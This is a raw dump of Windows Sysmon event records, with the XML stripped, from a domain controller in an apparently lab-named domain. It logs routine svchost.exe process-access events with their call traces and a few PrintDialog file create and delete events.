10341000x80000000000000005718Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:18.737{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005717Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:18.737{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005716Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:18.722{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005715Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:18.722{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005714Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:18.722{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005713Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:18.722{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005712Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:18.722{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005711Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:18.722{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005710Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:18.722{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005709Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:18.722{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005708Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:18.722{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005707Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:18.722{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005706Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:18.722{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005705Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:18.722{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005704Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:18.722{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005703Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:18.722{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005702Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:18.722{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005701Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:18.722{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005700Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:18.722{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005699Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:18.722{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005698Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:18.722{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005697Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:18.722{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 23542300x80000000000000005696Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:18.706{266CAFBE-64C6-6064-A900-00000000AE01}3404NT 
AUTHORITY\SYSTEMC:\Windows\system32\svchost.exeC:\Windows\PrintDialog\microsoft.system.package.metadata\Autogen\JSByteCodeCache_64MD5=1036E3DDDC89A4E68D8A33F3823A180E,SHA256=FB5E512425FC9449316EC95969EBE71E2D576DBAB833D61E2A5B9330FD70EE02,IMPHASH=00000000000000000000000000000000falsetrue 11241100x80000000000000005695Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:18.706{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exeC:\Users\Administrator\AppData\Local\Packages\Windows.PrintDialog_cw5n1h2txyewy\Settings\settings.dat2021-03-31 12:02:18.706 23542300x80000000000000005694Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:18.691{266CAFBE-64C6-6064-A900-00000000AE01}3404NT AUTHORITY\SYSTEMC:\Windows\system32\svchost.exeC:\Users\Administrator\AppData\Local\Packages\Windows.PrintDialog_cw5n1h2txyewy\Settings\settings.datMD5=A8308D2F3DDE0745E8B678BF69A2ECD0,SHA256=7FBB3E503ED8A4A8E5D5FAB601883CBB31D2E06D6B598460E570FB7A763EE555,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000005693Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:18.675{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005692Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 